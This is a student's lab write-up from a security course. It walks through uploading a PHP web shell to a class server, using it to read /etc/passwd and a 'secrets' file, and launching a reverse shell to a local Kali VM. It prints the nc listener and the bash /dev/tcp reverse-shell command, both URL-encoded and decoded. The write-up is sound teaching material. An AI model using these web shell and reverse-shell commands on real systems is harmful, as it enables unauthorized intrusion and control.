Jeremy Gautama

==============================================
===== Part 1: Installing a PHP web shell =====
==============================================

a. After uploading the php code, I typed in 
    http://danger.jeffondich.com/uploadedimages/gautamaj-webshell5.php?command=whoami in the url.
    The result is www-data.
b. <pre> tag is so that it's easily readable for humans. 
    Without it, http will make everything into one single line, 
    which would be very difficult to read.

==================================
===== Part 2: Looking around =====
==================================

a. /var/www/
b. root, www-data, jeff, postgres, bullwinkle.
    I know this by adding ...php?command=cat%20/etc/passwd in the back of the url.
    And by finding /bin/bash. In addition www-data from the whoami.
c. Yes.
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    syslog:x:104:111::/home/syslog:/usr/sbin/nologin
    _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
    tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
    uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin
    tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin
    usbmux:x:109:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
    sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
    pollinate:x:111:1::/var/cache/pollinate:/bin/false
    landscape:x:112:116::/var/lib/landscape:/usr/sbin/nologin
    fwupd-refresh:x:113:117:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
    jeff:x:1000:1000:Jeff Ondich,,,:/home/jeff:/bin/bash
    postgres:x:114:119:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    bullwinkle:x:1001:1001:Bullwinkle J. Moose,,,:/home/bullwinkle:/bin/bash
d. I do not have access to the file /etc/shadow. 
    From: https://www.cyberciti.biz/faq/understanding-etcshadow-file/
        sai:x:1001:1002:Sai Kumar,555,123456789,999123457:/home/sai:/bin/bash
            And an encrypted password hash for a user named ‘sai’ 
            in the /etc/shadow file is as follows:
        sai:$6$YTJ7JKnfsB4esnbS$5XvmYk2.GXVWhDo2TYGN2hCitD/wU9Kov.uZD8xsnleuf1r0ARX3qodIKiDsdoQA444b8IMPMOnUWDmVJVkeg1:19446:0:99999:7:::
e. Using ...php?command=ls%20-la%20/var/www/danger.jeffondich.com
    There exists a directory drwxrwxr-x 2 jeff     www-data   4096 Oct 24 21:53 secrets
    And inside the secrets directory, there's a file -rw-rw-r-- 1 jeff www-data  227 Nov 12  2023 kindasecret.txt
    And by using ...php?command=cat%20/var/www/danger.jeffondich.com/secrets/kindasecret.txt
    It shows...
    Congratulations!
            _   _
           (.)_(.)
        _ (   _   ) _
       / \/`-----'\/ \
     __\ ( (     ) ) /__
     )   /\ \._./ /\   (
      )_/ /|\   /|\ \_(

    by Joan Stark, https://www.asciiart.eu/animals/frogs


====================================
===== Part 3: Setup For Part 4 =====
====================================

Completed!

=============================================
===== Part 4: Launching A Reverse Shell =====
=============================================

a. 192.168.64.2. From typing in ifconfig in my kali's terminal.
b. 192.168.64.1 and 10.133.4.127. From typing in ifconfig in my mac's terminal.
    Choose 192.168.64.1, because it is in the same network/subnet.
c. nc -l 6000
d. http://192.168.64.2/webshell.php?command=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.64.1/6000%200%3E%261%22
e. I do have a shell now. 
    Yes, it is letting me execute commands on Kali.
    I know it's kali because www-data@kali:/var/www/html$
f. %20 is a space
    %22 is a "double quote"
    %3E is the greater than (>) symbol
    %26 is the and (&) symbol
    0%3E%261 is the sequence 0>&1

    So it basically looks like this:
    ...php?command=bash -c "bash -i >& /dev/tcp/192.168.64.1/6000 0>&1"
g.